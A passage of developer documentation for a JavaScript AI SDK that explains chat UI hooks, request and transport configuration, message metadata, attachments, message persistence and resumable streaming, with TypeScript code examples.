When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your chatbot application.

Similarly, you can also request the AI provider to reprocess the last message by calling the regenerate function returned by the useChat hook:

const { regenerate, status } = useChat();

return (
  <>
    <button
      onClick={regenerate}
      disabled={!(status === 'ready' || status === 'error')}
    >
      Regenerate
    </button>
    ...
  </>
);

When the user clicks the "Regenerate" button, the AI provider will regenerate the last message and replace the current one correspondingly.

Throttling UI Updates

This feature is currently only available for React.

By default, the useChat hook will trigger a render every time a new chunk is received. You can throttle the UI updates with the experimental_throttle option.

const { messages, ... } = useChat({
  // Throttle the messages and data updates to 50ms:
  experimental_throttle: 50
})

Event Callbacks

useChat provides optional event callbacks that you can use to handle different stages of the chatbot lifecycle:

onFinish: Called when the assistant response is completed. The event includes the response message, all messages, and flags for abort, disconnect, and errors.
onError: Called when an error occurs during the fetch request.
onData: Called whenever a data part is received.

These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.

import { UIMessage } from 'ai';

const {
  /* ... */
} = useChat({
  onFinish: ({ message, messages, isAbort, isDisconnect, isError }) => {
    // use information to e.g. update other UI states
  },
  onError: error => {
    console.error('An error occurred:', error);
  },
  onData: data => {
    console.log('Received data part from server:', data);
  },
});

Request Configuration

Custom headers, body, and credentials

By default, the useChat hook sends a HTTP POST request to the /api/chat endpoint with the message list as the request body. You can customize the request in two ways:

Hook-Level Configuration (Applied to all requests)

You can configure transport-level options that will be applied to all requests made by the hook:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/custom-chat',
    headers: {
      Authorization: 'your_token',
    },
    body: {
      user_id: '123',
    },
    credentials: 'same-origin',
  }),
});

Dynamic Hook-Level Configuration

You can also provide functions that return configuration values. This is useful for authentication tokens that need to be refreshed, or for configuration that depends on runtime conditions:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/custom-chat',
    headers: () => ({
      Authorization: `Bearer ${getAuthToken()}`,
      'X-User-ID': getCurrentUserId(),
    }),
    body: () => ({
      sessionId: getCurrentSessionId(),
      preferences: getUserPreferences(),
    }),
    credentials: () => 'include',
  }),
});

Request-Level Configuration (Recommended)

// Pass options as the second parameter to sendMessage
sendMessage(
  { text: input },
  {
    headers: {
      Authorization: 'Bearer token123',
      'X-Custom-Header': 'custom-value',
    },
    body: {
      temperature: 0.7,
      max_tokens: 100,
      user_id: '123',
    },
    metadata: {
      userId: 'user123',
      sessionId: 'session456',
    },
  },
);

The request-level options are merged with hook-level options, with request-level options taking precedence. On your server side, you can handle the request with this additional information.

Setting custom body fields per request

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const { messages, sendMessage } = useChat();
  const [input, setInput] = useState('');

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}:{' '}
          {m.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}

      <form
        onSubmit={event => {
          event.preventDefault();
          if (input.trim()) {
            sendMessage(
              { text: input },
              {
                body: {
                  customKey: 'customValue',
                },
              },
            );
            setInput('');
          }
        }}
      >
        <input value={input} onChange={e => setInput(e.target.value)} />
      </form>
    </div>
  );
}

You can retrieve these custom fields on your server side by destructuring the request body:

export async function POST(req: Request) {
  // Extract additional information ("customKey") from the body of the request:
  const { messages, customKey }: { messages: UIMessage[]; customKey: string } =
    await req.json();
  //...
}

Message Metadata

You can attach custom metadata to messages for tracking information like timestamps, model details, and token usage.

// Server: Send metadata about the message
return result.toUIMessageStreamResponse({
  messageMetadata: ({ part }) => {
    if (part.type === 'start') {
      return {
        createdAt: Date.now(),
        model: 'gpt-5.1',
      };
    }

    if (part.type === 'finish') {
      return {
        totalTokens: part.totalUsage.totalTokens,
      };
    }
  },
});

// Client: Access metadata via message.metadata
{
  messages.map(message => (
    <div key={message.id}>
      {message.role}:{' '}
      {message.metadata?.createdAt &&
        new Date(message.metadata.createdAt).toLocaleTimeString()}
      {/* Render message content */}
      {message.parts.map((part, index) =>
        part.type === 'text' ? <span key={index}>{part.text}</span> : null,
      )}
      {/* Show token count if available */}
      {message.metadata?.totalTokens && (
        <span>{message.metadata.totalTokens} tokens</span>
      )}
    </div>
  ));
}

For complete examples with type safety and advanced use cases, see the Message Metadata documentation.

Transport Configuration

You can configure custom transport behavior using the transport option to customize how messages are sent to your API:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

export default function Chat() {
  const { messages, sendMessage } = useChat({
    id: 'my-chat',
    transport: new DefaultChatTransport({
      prepareSendMessagesRequest: ({ id, messages }) => {
        return {
          body: {
            id,
            message: messages[messages.length - 1],
          },
        };
      },
    }),
  });

  // ... rest of your component
}

The corresponding API route receives the custom request format:

export async function POST(req: Request) {
  const { id, message } = await req.json();

  // Load existing messages and add the new one
  const messages = await loadMessages(id);
  messages.push(message);

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Advanced: Trigger-based routing

For more complex scenarios like message regeneration, you can use trigger-based routing:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

export default function Chat() {
  const { messages, sendMessage, regenerate } = useChat({
    id: 'my-chat',
    transport: new DefaultChatTransport({
      prepareSendMessagesRequest: ({ id, messages, trigger, messageId }) => {
        if (trigger === 'submit-user-message') {
          return {
            body: {
              trigger: 'submit-user-message',
              id,
              message: messages[messages.length - 1],
              messageId,
            },
          };
        } else if (trigger === 'regenerate-assistant-message') {
          return {
            body: {
              trigger: 'regenerate-assistant-message',
              id,
              messageId,
            },
          };
        }
        throw new Error(`Unsupported trigger: ${trigger}`);
      },
    }),
  });

  // ... rest of your component
}

The corresponding API route would handle different triggers:

export async function POST(req: Request) {
  const { trigger, id, message, messageId } = await req.json();

  const chat = await readChat(id);
  let messages = chat.messages;

  if (trigger === 'submit-user-message') {
    // Handle new user message
    messages = [...messages, message];
  } else if (trigger === 'regenerate-assistant-message') {
    // Handle message regeneration - remove messages after messageId
    const messageIndex = messages.findIndex(m => m.id === messageId);
    if (messageIndex !== -1) {
      messages = messages.slice(0, messageIndex);
    }
  }

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

To learn more about building custom transports, refer to the Transport API documentation.

Direct Agent Transport

For scenarios where you want to communicate directly with an Agent without going through HTTP, you can use DirectChatTransport. This is useful for:

Server-side rendering scenarios
Testing without network
Single-process applications

import { useChat } from '@ai-sdk/react';
import { DirectChatTransport, ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: 'You are a helpful assistant.',
});

export default function Chat() {
  const { messages, sendMessage, status } = useChat({
    transport: new DirectChatTransport({ agent }),
  });

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}

      <button
        onClick={() => sendMessage({ text: 'Hello!' })}
        disabled={status !== 'ready'}
      >
        Send
      </button>
    </>
  );
}

The DirectChatTransport invokes the agent's stream() method directly, converting UI messages to model messages and streaming the response back as UI message chunks.

For more details, see the DirectChatTransport reference.

Controlling the response stream

With streamText, you can control how error messages and usage information are sent back to the client.

Error Messages

import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    onError: error => {
      if (error == null) {
        return 'unknown error';
      }

      if (typeof error === 'string') {
        return error;
      }

      if (error instanceof Error) {
        return error.message;
      }

      return JSON.stringify(error);
    },
  });
}

Usage Information

Track token consumption and resource usage with message metadata:

Define a custom metadata type with usage fields (optional, for type safety)
Attach usage data using messageMetadata in your response
Display usage metrics in your UI components

Usage data is attached as metadata to messages and becomes available once the model completes its response generation.

import { openai } from '@ai-sdk/openai';
import {
  convertToModelMessages,
  streamText,
  UIMessage,
  type LanguageModelUsage,
} from 'ai';
__PROVIDER_IMPORT__;

// Create a new metadata type (optional for type-safety)
type MyMetadata = {
  totalUsage: LanguageModelUsage;
};

// Create a new custom message type with your own metadata
export type MyUIMessage = UIMessage<MyMetadata>;

export async function POST(req: Request) {
  const { messages }: { messages: MyUIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    messageMetadata: ({ part }) => {
      // Send total usage when generation is finished
      if (part.type === 'finish') {
        return { totalUsage: part.totalUsage };
      }
    },
  });
}

Then, on the client, you can access the message-level metadata.

'use client';

import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from './api/chat/route';
import { DefaultChatTransport } from 'ai';

export default function Chat() {
  // Use custom message type defined on the server (optional for type-safety)
  const { messages } = useChat<MyUIMessage>({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(m => (
        <div key={m.id} className="whitespace-pre-wrap">
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.parts.map(part => {
            if (part.type === 'text') {
              return part.text;
            }
          })}
          {/* Render usage via metadata */}
          {m.metadata?.totalUsage && (
            <div>Total usage: {m.metadata?.totalUsage.totalTokens} tokens</div>
          )}
        </div>
      ))}
    </div>
  );
}

You can also access your metadata from the onFinish callback of useChat:

'use client';

import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from './api/chat/route';
import { DefaultChatTransport } from 'ai';

export default function Chat() {
  // Use custom message type defined on the server (optional for type-safety)
  const { messages } = useChat<MyUIMessage>({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
    onFinish: ({ message }) => {
      // Access message metadata via onFinish callback
      console.log(message.metadata?.totalUsage);
    },
  });
}

Text Streams

useChat can handle plain text streams by setting the streamProtocol option to text:

'use client';

import { useChat } from '@ai-sdk/react';
import { TextStreamChatTransport } from 'ai';

export default function Chat() {
  const { messages } = useChat({
    transport: new TextStreamChatTransport({
      api: '/api/chat',
    }),
  });

  return <>...</>;
}

This configuration also works with other backend servers that stream plain text. Check out the stream protocol guide for more information.

Reasoning

Some models such as DeepSeek deepseek-r1 and Anthropic claude-sonnet-4-5-20250929 support reasoning tokens. These tokens are typically sent before the message content. You can forward them to the client with the sendReasoning option:

import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'deepseek/deepseek-r1',
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    sendReasoning: true,
  });
}

On the client side, you can access the reasoning parts of the message object.

Reasoning parts have a text property that contains the reasoning content.

messages.map(message => (
  <div key={message.id}>
    {message.role === 'user' ? 'User: ' : 'AI: '}
    {message.parts.map((part, index) => {
      // text parts:
      if (part.type === 'text') {
        return <div key={index}>{part.text}</div>;
      }

      // reasoning parts:
      if (part.type === 'reasoning') {
        return <pre key={index}>{part.text}</pre>;
      }
    })}
  </div>
));

Sources

Some providers such as Perplexity and Google Generative AI include sources in the response.

Currently sources are limited to web pages that ground the response. You can forward them to the client with the sendSources option:

import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'perplexity/sonar-pro',
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    sendSources: true,
  });
}

messages.map(message => (
  <div key={message.id}>
    {message.role === 'user' ? 'User: ' : 'AI: '}

    {/* Render URL sources */}
    {message.parts
      .filter(part => part.type === 'source-url')
      .map(part => (
        <span key={`source-${part.id}`}>
          [
          <a href={part.url} target="_blank">
            {part.title ?? new URL(part.url).hostname}
          </a>
          ]
        </span>
      ))}

    {/* Render document sources */}
    {message.parts
      .filter(part => part.type === 'source-document')
      .map(part => (
        <span key={`source-${part.id}`}>
          [<span>{part.title ?? `Document ${part.id}`}</span>]
        </span>
      ))}
  </div>
));

Image Generation

Some models such as Google gemini-2.5-flash-image support image generation. When images are generated, they are exposed as files to the client. On the client side, you can access file parts of the message object and render them as images.

messages.map(message => (
  <div key={message.id}>
    {message.role === 'user' ? 'User: ' : 'AI: '}
    {message.parts.map((part, index) => {
      if (part.type === 'text') {
        return <div key={index}>{part.text}</div>;
      } else if (part.type === 'file' && part.mediaType.startsWith('image/')) {
        return <img key={index} src={part.url} alt="Generated image" />;
      }
    })}
  </div>
));

Attachments

There are two ways to send files with a message: using a FileList object from file inputs or using an array of file objects.

FileList

'use client';

import { useChat } from '@ai-sdk/react';
import { useRef, useState } from 'react';

export default function Page() {
  const { messages, sendMessage, status } = useChat();

  const [input, setInput] = useState('');
  const [files, setFiles] = useState<FileList | undefined>(undefined);
  const fileInputRef = useRef<HTMLInputElement>(null);

  return (
    <div>
      <div>
        {messages.map(message => (
          <div key={message.id}>
            <div>{`${message.role}: `}</div>

            <div>
              {message.parts.map((part, index) => {
                if (part.type === 'text') {
                  return <span key={index}>{part.text}</span>;
                }

                if (
                  part.type === 'file' &&
                  part.mediaType?.startsWith('image/')
                ) {
                  return <img key={index} src={part.url} alt={part.filename} />;
                }

                return null;
              })}
            </div>
          </div>
        ))}
      </div>

      <form
        onSubmit={event => {
          event.preventDefault();
          if (input.trim()) {
            sendMessage({
              text: input,
              files,
            });
            setInput('');
            setFiles(undefined);

            if (fileInputRef.current) {
              fileInputRef.current.value = '';
            }
          }
        }}
      >
        <input
          type="file"
          onChange={event => {
            if (event.target.files) {
              setFiles(event.target.files);
            }
          }}
          multiple
          ref={fileInputRef}
        />
        <input
          value={input}
          placeholder="Send message..."
          onChange={e => setInput(e.target.value)}
          disabled={status !== 'ready'}
        />
      </form>
    </div>
  );
}

File Objects

You can also send files as objects along with a message. This can be useful for sending pre-uploaded files or data URLs.

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { FileUIPart } from 'ai';

export default function Page() {
  const { messages, sendMessage, status } = useChat();

  const [input, setInput] = useState('');
  const [files] = useState<FileUIPart[]>([
    {
      type: 'file',
      filename: 'earth.png',
      mediaType: 'image/png',
      url: 'https://example.com/earth.png',
    },
    {
      type: 'file',
      filename: 'moon.png',
      mediaType: 'image/png',
      url: 'data:image/png;base64,iVBORw0KGgo...',
    },
  ]);

  return (
    <div>
      <div>
        {messages.map(message => (
          <div key={message.id}>
            <div>{`${message.role}: `}</div>

            <div>
              {message.parts.map((part, index) => {
                if (part.type === 'text') {
                  return <span key={index}>{part.text}</span>;
                }

                if (
                  part.type === 'file' &&
                  part.mediaType?.startsWith('image/')
                ) {
                  return <img key={index} src={part.url} alt={part.filename} />;
                }

                return null;
              })}
            </div>
          </div>
        ))}
      </div>

      <form
        onSubmit={event => {
          event.preventDefault();
          if (input.trim()) {
            sendMessage({
              text: input,
              files,
            });
            setInput('');
          }
        }}
      >
        <input
          value={input}
          placeholder="Send message..."
          onChange={e => setInput(e.target.value)}
          disabled={status !== 'ready'}
        />
      </form>
    </div>
  );
}

Type Inference for Tools

When working with tools in TypeScript, AI SDK UI provides type inference helpers to ensure type safety for your tool inputs and outputs.

InferUITool

The InferUITool type helper infers the input and output types of a single tool for use in UI messages:

import { InferUITool } from 'ai';
import { z } from 'zod';

const weatherTool = {
  description: 'Get the current weather',
  inputSchema: z.object({
    location: z.string().describe('The city and state'),
  }),
  execute: async ({ location }) => {
    return `The weather in ${location} is sunny.`;
  },
};

// Infer the types from the tool
type WeatherUITool = InferUITool<typeof weatherTool>;
// This creates a type with:
// {
//   input: { location: string };
//   output: string;
// }

InferUITools

The InferUITools type helper infers the input and output types of a ToolSet:

import { InferUITools, ToolSet } from 'ai';
import { z } from 'zod';

const tools = {
  weather: {
    description: 'Get the current weather',
    inputSchema: z.object({
      location: z.string().describe('The city and state'),
    }),
    execute: async ({ location }) => {
      return `The weather in ${location} is sunny.`;
    },
  },
  calculator: {
    description: 'Perform basic arithmetic',
    inputSchema: z.object({
      operation: z.enum(['add', 'subtract', 'multiply', 'divide']),
      a: z.number(),
      b: z.number(),
    }),
    execute: async ({ operation, a, b }) => {
      switch (operation) {
        case 'add':
          return a + b;
        case 'subtract':
          return a - b;
        case 'multiply':
          return a * b;
        case 'divide':
          return a / b;
      }
    },
  },
} satisfies ToolSet;

// Infer the types from the tool set
type MyUITools = InferUITools<typeof tools>;
// This creates a type with:
// {
//   weather: { input: { location: string }; output: string };
//   calculator: { input: { operation: 'add' | 'subtract' | 'multiply' | 'divide'; a: number; b: number }; output: number };
// }

Using Inferred Types

You can use these inferred types to create a custom UIMessage type and pass it to various AI SDK UI functions:

import { InferUITools, UIMessage, UIDataTypes } from 'ai';

type MyUITools = InferUITools<typeof tools>;
type MyUIMessage = UIMessage<never, UIDataTypes, MyUITools>;

Pass the custom type to useChat or createUIMessageStream:

import { useChat } from '@ai-sdk/react';
import { createUIMessageStream } from 'ai';
import type { MyUIMessage } from './types';

// With useChat
const { messages } = useChat<MyUIMessage>();

// With createUIMessageStream
const stream = createUIMessageStream<MyUIMessage>(/* ... */);

This provides full type safety for tool inputs and outputs on the client and server.

title: Chatbot Message Persistence description: Learn how to store and load chat messages in a chatbot.

Chatbot Message Persistence

Being able to store and load chat messages is crucial for most AI chatbots. In this guide, we'll show how to implement message persistence with useChat and streamText.

Starting a new chat

When the user navigates to the chat page without providing a chat ID, we need to create a new chat and redirect to the chat page with the new chat ID.

import { redirect } from 'next/navigation';
import { createChat } from '@util/chat-store';

export default async function Page() {
  const id = await createChat(); // create a new chat
  redirect(`/chat/${id}`); // redirect to chat page, see below
}

import { generateId } from 'ai';
import { existsSync, mkdirSync } from 'fs';
import { writeFile } from 'fs/promises';
import path from 'path';

export async function createChat(): Promise<string> {
  const id = generateId(); // generate a unique chat ID
  await writeFile(getChatFile(id), '[]'); // create an empty chat file
  return id;
}

function getChatFile(id: string): string {
  const chatDir = path.join(process.cwd(), '.chats');
  if (!existsSync(chatDir)) mkdirSync(chatDir, { recursive: true });
  return path.join(chatDir, `${id}.json`);
}

Loading an existing chat

When the user navigates to the chat page with a chat ID, we need to load the chat messages from storage.

The loadChat function in our file-based chat store is implemented as follows:

import { UIMessage } from 'ai';
import { readFile } from 'fs/promises';

export async function loadChat(id: string): Promise<UIMessage[]> {
  return JSON.parse(await readFile(getChatFile(id), 'utf8'));
}

// ... rest of the file

Validating messages on the server

When processing messages on the server that contain tool calls, custom metadata, or data parts, you should validate them using validateUIMessages before sending them to the model.

Validation with tools

When your messages include tool calls, validate them against your tool definitions:

import {
  convertToModelMessages,
  streamText,
  UIMessage,
  validateUIMessages,
  tool,
} from 'ai';
import { z } from 'zod';
import { loadChat, saveChat } from '@util/chat-store';
import { dataPartsSchema, metadataSchema } from '@util/schemas';

// Define your tools
const tools = {
  weather: tool({
    description: 'Get weather information',
    parameters: z.object({
      location: z.string(),
      units: z.enum(['celsius', 'fahrenheit']),
    }),
    execute: async ({ location, units }) => {
      /* tool implementation */
    },
  }),
  // other tools
};

export async function POST(req: Request) {
  const { message, id } = await req.json();

  // Load previous messages from database
  const previousMessages = await loadChat(id);

  // Append new message to previousMessages messages
  const messages = [...previousMessages, message];

  // Validate loaded messages against
  // tools, data parts schema, and metadata schema
  const validatedMessages = await validateUIMessages({
    messages,
    tools, // Ensures tool calls in messages match current schemas
    dataPartsSchema,
    metadataSchema,
  });

  const result = streamText({
    model: 'openai/gpt-5-mini',
    messages: convertToModelMessages(validatedMessages),
    tools,
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    onFinish: ({ messages }) => {
      saveChat({ chatId: id, messages });
    },
  });
}

Handling validation errors

Handle validation errors gracefully when messages from the database don't match current schemas:

import {
  convertToModelMessages,
  streamText,
  validateUIMessages,
  TypeValidationError,
} from 'ai';
import { type MyUIMessage } from '@/types';

export async function POST(req: Request) {
  const { message, id } = await req.json();

  // Load and validate messages from database
  let validatedMessages: MyUIMessage[];

  try {
    const previousMessages = await loadMessagesFromDB(id);
    validatedMessages = await validateUIMessages({
      // append the new message to the previous messages:
      messages: [...previousMessages, message],
      tools,
      metadataSchema,
    });
  } catch (error) {
    if (error instanceof TypeValidationError) {
      // Log validation error for monitoring
      console.error('Database messages validation failed:', error);
      // Could implement message migration or filtering here
      // For now, start with empty history
      validatedMessages = [];
    } else {
      throw error;
    }
  }

  // Continue with validated messages...
}

Displaying the chat

Once messages are loaded from storage, you can display them in your chat UI. Here's how to set up the page component and the chat display:

import { loadChat } from '@util/chat-store';
import Chat from '@ui/chat';

export default async function Page(props: { params: Promise<{ id: string }> }) {
  const { id } = await props.params;
  const messages = await loadChat(id);
  return <Chat id={id} initialMessages={messages} />;
}

The chat component uses the useChat hook to manage the conversation:

'use client';

import { UIMessage, useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Chat({
  id,
  initialMessages,
}: { id?: string | undefined; initialMessages?: UIMessage[] } = {}) {
  const [input, setInput] = useState('');
  const { sendMessage, messages } = useChat({
    id, // use the provided chat ID
    messages: initialMessages, // load initial messages
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  // simplified rendering code, extend as needed:
  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.parts
            .map(part => (part.type === 'text' ? part.text : ''))
            .join('')}
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          placeholder="Type a message..."
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

Storing messages

useChat sends the chat id and the messages to the backend.

When loading messages from storage that contain tools, metadata, or custom data parts, validate them using validateUIMessages before processing (see the validation section above).

Storing messages is done in the onFinish callback of the toUIMessageStreamResponse function. onFinish receives the complete messages including the new AI response as UIMessage[].

import { openai } from '@ai-sdk/openai';
import { saveChat } from '@util/chat-store';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages, chatId }: { messages: UIMessage[]; chatId: string } =
    await req.json();

  const result = streamText({
    model: 'openai/gpt-5-mini',
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    onFinish: ({ messages }) => {
      saveChat({ chatId, messages });
    },
  });
}

The actual storage of the messages is done in the saveChat function, which in our file-based chat store is implemented as follows:

import { UIMessage } from 'ai';
import { writeFile } from 'fs/promises';

export async function saveChat({
  chatId,
  messages,
}: {
  chatId: string;
  messages: UIMessage[];
}): Promise<void> {
  const content = JSON.stringify(messages, null, 2);
  await writeFile(getChatFile(chatId), content);
}

// ... rest of the file

Message IDs

In addition to a chat ID, each message has an ID. You can use this message ID to e.g. manipulate individual messages.

Client-side vs Server-side ID Generation

By default, message IDs are generated client-side:

User message IDs are generated by the useChat hook on the client
AI response message IDs are generated by streamText on the server

Setting Up Server-side ID Generation

When implementing persistence, you have two options for generating server-side IDs:

Using generateMessageId in toUIMessageStreamResponse
Setting IDs in your start message part with createUIMessageStream

Option 1: Using `generateMessageId` in `toUIMessageStreamResponse`

You can control the ID format by providing ID generators using createIdGenerator():

import { createIdGenerator, streamText } from 'ai';

export async function POST(req: Request) {
  // ...
  const result = streamText({
    // ...
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    // Generate consistent server-side IDs for persistence:
    generateMessageId: createIdGenerator({
      prefix: 'msg',
      size: 16,
    }),
    onFinish: ({ messages }) => {
      saveChat({ chatId, messages });
    },
  });
}

Option 2: Setting IDs with `createUIMessageStream`

Alternatively, you can use createUIMessageStream to control the message ID by writing a start message part:

import {
  generateId,
  streamText,
  createUIMessageStream,
  createUIMessageStreamResponse,
} from 'ai';

export async function POST(req: Request) {
  const { messages, chatId } = await req.json();

  const stream = createUIMessageStream({
    execute: ({ writer }) => {
      // Write start message part with custom ID
      writer.write({
        type: 'start',
        messageId: generateId(), // Generate server-side ID for persistence
      });

      const result = streamText({
        model: 'openai/gpt-5-mini',
        messages: await convertToModelMessages(messages),
      });

      writer.merge(result.toUIMessageStream({ sendStart: false })); // omit start message part
    },
    originalMessages: messages,
    onFinish: ({ responseMessage }) => {
      // save your chat here
    },
  });

  return createUIMessageStreamResponse({ stream });
}

import { createIdGenerator } from 'ai';
import { useChat } from '@ai-sdk/react';

const { ... } = useChat({
  generateId: createIdGenerator({
    prefix: 'msgc',
    size: 16,
  }),
  // ...
});

Sending only the last message

To achieve this, you can provide a prepareSendMessagesRequest function to the transport. This function receives the messages and the chat ID, and returns the request body to be sent to the server.

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const {
  // ...
} = useChat({
  // ...
  transport: new DefaultChatTransport({
    api: '/api/chat',
    // only send the last message to the server:
    prepareSendMessagesRequest({ messages, id }) {
      return { body: { message: messages[messages.length - 1], id } };
    },
  }),
});

On the server, you can then load the previous messages and append the new message to the previous messages. If your messages contain tools, metadata, or custom data parts, you should validate them:

import { convertToModelMessages, UIMessage, validateUIMessages } from 'ai';
// import your tools and schemas

export async function POST(req: Request) {
  // get the last message from the client:
  const { message, id } = await req.json();

  // load the previous messages from the server:
  const previousMessages = await loadChat(id);

  // validate messages if they contain tools, metadata, or data parts:
  const validatedMessages = await validateUIMessages({
    // append the new message to the previous messages:
    messages: [...previousMessages, message],
    tools, // if using tools
    metadataSchema, // if using custom metadata
    dataSchemas, // if using custom data parts
  });

  const result = streamText({
    // ...
    messages: convertToModelMessages(validatedMessages),
  });

  return result.toUIMessageStreamResponse({
    originalMessages: validatedMessages,
    onFinish: ({ messages }) => {
      saveChat({ chatId: id, messages });
    },
  });
}

Handling client disconnects

By default, the AI SDK streamText function uses backpressure to the language model provider to prevent the consumption of tokens that are not yet requested.

import { convertToModelMessages, streamText, UIMessage } from 'ai';
import { saveChat } from '@util/chat-store';

export async function POST(req: Request) {
  const { messages, chatId }: { messages: UIMessage[]; chatId: string } =
    await req.json();

  const result = streamText({
    model,
    messages: await convertToModelMessages(messages),
  });

  // consume the stream to ensure it runs to completion & triggers onFinish
  // even when the client response is aborted:
  result.consumeStream(); // no await

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    onFinish: ({ messages }) => {
      saveChat({ chatId, messages });
    },
  });
}

When the client reloads the page after a disconnect, the chat will be restored from the storage solution.

For more robust handling of disconnects, you may want to add resumability on disconnects. Check out the Chatbot Resume Streams documentation to learn more.

title: Chatbot Resume Streams description: Learn how to resume chatbot streams after client disconnects.

Chatbot Resume Streams

useChat supports resuming ongoing streams after page reloads. Use this feature to build applications with long-running generations.

How stream resumption works

Stream resumption requires persistence for messages and active streams in your application. The AI SDK provides tools to connect to storage, but you need to set up the storage yourself.

The AI SDK provides:

A resume option in useChat that automatically reconnects to active streams
Access to the outgoing stream through the consumeSseStream callback
Automatic HTTP requests to your resume endpoints

You build:

Storage to track which stream belongs to each chat
Redis to store the UIMessage stream
Two API endpoints: POST to create streams, GET to resume them
Integration with resumable-stream to manage Redis storage

Prerequisites

To implement resumable streams in your chat application, you need:

The resumable-stream package - Handles the publisher/subscriber mechanism for streams
A Redis instance - Stores stream data (e.g. Redis through Vercel)
A persistence layer - Tracks which stream ID is active for each chat (e.g. database)

Implementation

1. Client-side: Enable stream resumption

Use the resume option in the useChat hook to enable stream resumption. When resume is true, the hook automatically attempts to reconnect to any active stream for the chat on mount:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport, type UIMessage } from 'ai';

export function Chat({
  chatData,
  resume = false,
}: {
  chatData: { id: string; messages: UIMessage[] };
  resume?: boolean;
}) {
  const { messages, sendMessage, status } = useChat({
    id: chatData.id,
    messages: chatData.messages,
    resume, // Enable automatic stream resumption
    transport: new DefaultChatTransport({
      // You must send the id of the chat
      prepareSendMessagesRequest: ({ id, messages }) => {
        return {
          body: {
            id,
            message: messages[messages.length - 1],
          },
        };
      },
    }),
  });

  return <div>{/* Your chat UI */}</div>;
}

When you enable resume, the useChat hook makes a GET request to /api/chat/[id]/stream on mount to check for and resume any active streams.

Let's start by creating the POST handler to create the resumable stream.

2. Create the POST handler

The POST handler creates resumable streams using the consumeSseStream callback:

import { openai } from '@ai-sdk/openai';
import { readChat, saveChat } from '@util/chat-store';
import {
  convertToModelMessages,
  generateId,
  streamText,
  type UIMessage,
} from 'ai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';

export async function POST(req: Request) {
  const {
    message,
    id,
  }: {
    message: UIMessage | undefined;
    id: string;
  } = await req.json();

  const chat = await readChat(id);
  let messages = chat.messages;

  messages = [...messages, message!];

  // Clear any previous active stream and save the user message
  saveChat({ id, messages, activeStreamId: null });

  const result = streamText({
    model: 'openai/gpt-5-mini',
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    generateMessageId: generateId,
    onFinish: ({ messages }) => {
      // Clear the active stream when finished
      saveChat({ id, messages, activeStreamId: null });
    },
    async consumeSseStream({ stream }) {
      const streamId = generateId();

      // Create a resumable stream from the SSE stream
      const streamContext = createResumableStreamContext({ waitUntil: after });
      await streamContext.createNewResumableStream(streamId, () => stream);

      // Update the chat with the active stream ID
      saveChat({ id, activeStreamId: streamId });
    },
  });
}

